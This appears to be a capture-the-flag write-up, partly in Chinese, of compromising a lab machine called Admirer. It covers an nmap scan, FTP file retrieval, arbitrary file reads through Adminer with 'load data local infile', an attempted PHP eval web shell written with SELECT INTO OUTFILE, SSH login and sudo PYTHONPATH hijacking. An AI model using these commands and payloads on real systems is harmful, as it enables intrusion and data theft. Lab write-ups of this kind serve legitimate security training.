C:\root\Documents\exploit> nmap 10.10.10.187 Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-07 08:38 EDT Nmap scan report for 10.10.10.187 Host is up (0.12s latency). Not shown: 997 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 1.90 seconds
C:\root\Documents\exploit> ftp 10.10.10.187 Connected to 10.10.10.187. 220 (vsFTPd 3.0.3) Name (10.10.10.187:root): ftpuser 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -la 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-x--- 2 0 111 4096 Dec 03 2019 . drwxr-x--- 2 0 111 4096 Dec 03 2019 .. -rw-r--r-- 1 0 0 3405 Dec 02 2019 dump.sql -rw-r--r-- 1 0 0 5270987 Dec 03 2019 html.tar.gz 226 Directory send OK. ftp> get dump.sql local: dump.sql remote: dump.sql 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for dump.sql (3405 bytes). 226 Transfer complete. 3405 bytes received in 0.00 secs (34.5453 MB/s) ftp> get html.tar.gz local: html.tar.gz remote: html.tar.gz 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for html.tar.gz (5270987 bytes). 5253816 bytes received in 112.50 secs (45.6071 kB/s)
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; /*!40101 SET NAMES utf8mb4 */; /*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */; /*!40103 SET TIME_ZONE='+00:00' */; /*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */; /*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */; /*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */; /*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;
LOCKTABLES`items` WRITE; /*!40000 ALTER TABLE `items` DISABLE KEYS */; INSERTINTO`items`VALUES (1,'images/thumbs/thmb_art01.jpg','images/fulls/art01.jpg','Visual Art','A pure showcase of skill and emotion.'),(2,'images/thumbs/thmb_eng02.jpg','images/fulls/eng02.jpg','The Beauty and the Beast','Besides the technology, there is also the eye candy...'),(3,'images/thumbs/thmb_nat01.jpg','images/fulls/nat01.jpg','The uncontrollable lightshow','When the sun decides to play at night.'),(4,'images/thumbs/thmb_arch02.jpg','images/fulls/arch02.jpg','Nearly Monochromatic','One could simply spend hours looking at this indoor square.'),(5,'images/thumbs/thmb_mind01.jpg','images/fulls/mind01.jpg','Way ahead of his time','You probably still use some of his inventions... 500yrs later.'),(6,'images/thumbs/thmb_mus02.jpg','images/fulls/mus02.jpg','The outcomes of complexity','Seriously, listen to Dust in Interstellar\'s OST. Thank me later.'),(7,'images/thumbs/thmb_arch01.jpg','images/fulls/arch01.jpg','Back to basics','And centuries later, we want togo back and live in nature... Sort of.'),(8,'images/thumbs/thmb_mind02.jpg','images/fulls/mind02.jpg','We need him back','He might have been a loner who allegedly slept with a pigeon, but that brain...'),(9,'images/thumbs/thmb_eng01.jpg','images/fulls/eng01.jpg','In the nameof Science','Some theories need to be proven.'),(10,'images/thumbs/thmb_mus01.jpg','images/fulls/mus01.jpg','Equal Temperament','Because without him, music would not exist (as we know it today).'); /*!40000 ALTER TABLE `items` ENABLE KEYS */; UNLOCK TABLES; /*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */; /*!40101 SET SQL_MODE=@OLD_SQL_MODE */; /*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */; /*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */; /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */; /*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */; -- Dump completed on 2019-12-02 20:24:15
这里用了 adminer ,用前面的账号密码一一尝试也不对。google了一下发现这个工具可以链接外部的数据库服务器,并且配合 load data local infile 实现任意文件读取。
文件读取
创建本地数据库
先在本地创建一个表,待会读取的文件就存放到这个表里面。
1
create table adminer (text varchar(200));
然后在adminer的登录界面输入我们自己的数据库地址、用户名、密码、数据库名等等,登录成功之后就可以利用 load data local infile 进行文件读取。这里开始没搞懂一直用 load data infile 去读取文件,这里加上 local 的话就是读取运行 adminer 的服务器上的文件,不加 local 就是读取实际运行sql 语句的服务器上的文件,所以这里我们需要使用这个语句来读取
1
load data local infile '/etc/passwd' into table adminer FIELDS TERMINATED BY '\n';
CREATETABLE a (cmd textNOTNULL); INSERTINTO a (cmd) VALUES('<?php eval($_POST[\'password\']);?>'); SELECT cmd from a intooutfile'/var/www/html/chen1sheng.php';
不过因为这个账号权限太低了,所以写入会报错:Error in query (1045): Access denied for user 'waldo'@'localhost' (using password: YES) 所以这条路肯定也走不通了。
ssh连接
再用新密码尝试下ssh,结果成功连接上去了,接下来就是提权了
1 2 3 4 5 6
waldo@admirer:~$ ls user.txt waldo@admirer:~$ id uid=1000(waldo) gid=1000(waldo) groups=1000(waldo),1001(admins) waldo@admirer:~$ cat user.txt 5233f4af5a2602394f7c16426973283c
waldo@admirer:~/py$ sudo PYTHONPATH=~/py /opt/scripts/admin_tasks.sh [sudo] password for waldo:
[[[ System Administration Menu ]]] 1) View system uptime 2) View logged in users 3) View crontab 4) Backup passwd file 5) Backup shadow file 6) Backup web data 7) Backup DB 8) Quit Choose an option: 6 Running backup script in the background, it might take a while...